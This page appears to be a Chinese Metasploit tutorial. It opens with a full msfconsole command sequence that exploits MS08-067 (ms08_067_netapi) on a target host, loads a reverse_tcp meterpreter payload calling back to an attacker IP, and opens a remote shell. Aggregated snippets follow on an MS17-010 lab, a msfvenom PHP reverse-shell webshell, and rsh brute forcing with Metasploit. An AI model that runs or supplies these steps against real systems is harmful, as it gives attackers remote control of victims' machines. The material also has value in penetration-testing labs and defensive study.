msfconsole

search ms08_067_natapi

use exploit/windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set RHOST 192.168.0.11(攻击的目的主机IP)

set LHOST 192.168.0.110(攻击的源的主机IP)

set LPORT 8080

exploit

ps

shell

dir

时间: 2025-01-02 18:56:16

msfconsole的相关文章

kali 的 msfconsole 使用

第一次使用msfconsole  要先把内建的数据库PostgreSQL开启和metasplote,然后在运行msfconsole 开启PostgreSQL:  service postgresql start 确认开启:ps -e|grep 5432(主要看5432端口有没有开启,postgresql这个服务的默认占用端口是5432) 开启metasploit:  service metasploit start 最后是运行 msfconsole 如果想开机启动这两项服务的话 ,如果是gnom

基于msfconsole下利用ms17_010漏洞实验

1.理论 在MSF里面msfconsole可以说是最流行的一个接口程序.但是msfconsole真的是一个强大的接口程序.Msfconsole提供了一个一体化的集中控制台.通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等.Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用. 2.操作 在msfconsole下查找ms17_010 利用该漏洞的poc进行exploit

metasploit msfconsole 命令

metasploit msfconsole 命令 msf > help db_autopwn Commands =================== Command Description ------- ----------- db_autopwn Automatically exploit everything Core Commands ============= Command Description ------- ----------- ? Help menu banner Dis

Kali Linux 2020.1a版本msfconsole启动失败问题

Kali Linux 2020.1a版本msfconsole启动失败问题 Kali Linux 2020.1a系统安装后,启动msfconsole将出现如下错误:[email protected]:~# msfconsole [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler / setup' [*] You may need to uninstall or upgrade b

Msfconsole中set payload命令最新改进

Msfconsole中set payload命令最新改进 为了方便用户的输入,Msfconsole改进了set payload命令的输入.在执行set payload命令时,可以使用三种前缀,分别是/payload.payload.和/.或者,不使用任何前缀,直接指定攻击载荷路径即可.其中,可以执行的四种方式如下所示: (1)msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload /payload/windows/x64/mete

Metasploit 使用msfconsole帮助功能技巧

Metasploit 使用msfconsole帮助功能技巧 当用户使用Metasploit框架时,通常都是直接执行msfconsole,进入MSF终端.此时,将使用所有默认设置启动了Metasploit框架.用户也可以在启动时,进行简单配置.为了帮助用户配置Metasploit框架,启动MSF终端时,使用msfconsole --help技巧查看更多可以配置的选项.然后,在执行msfconsole时,指定配置的选项参数即可.例如,设置退出Metasploit时,提示确定退出Metasploit.

msfconsole web后门

一.PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹.步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell payload : msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.48.154 -f raw > webshell.php cp webshe

kali学习(一)

kali使用阿里更新源: gedit /etc/apt/sources.list粘帖以下内容deb http://mirrors.aliyun.com/kali kali main non-free contribdeb-src http://mirrors.aliyun.com/kali kali main non-free contribdeb http://mirrors.aliyun.com/kali-security kali/updates main contrib non-free

Metasploit爆破tcpwrapped服务

一.利用nmap工具扫描目标主机 1.1 使用nmap命令对目标主机进行扫描. 1.2 在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放514端口,开放tcpwrapped服务. 1.3 在终端中输入命令"msfconsole",启动MSF终端. 1.4 在终端中输入命令"search rsh_login",搜索rsh_login的相关工具和攻击载荷. 1.5 在终端中输入命令"use a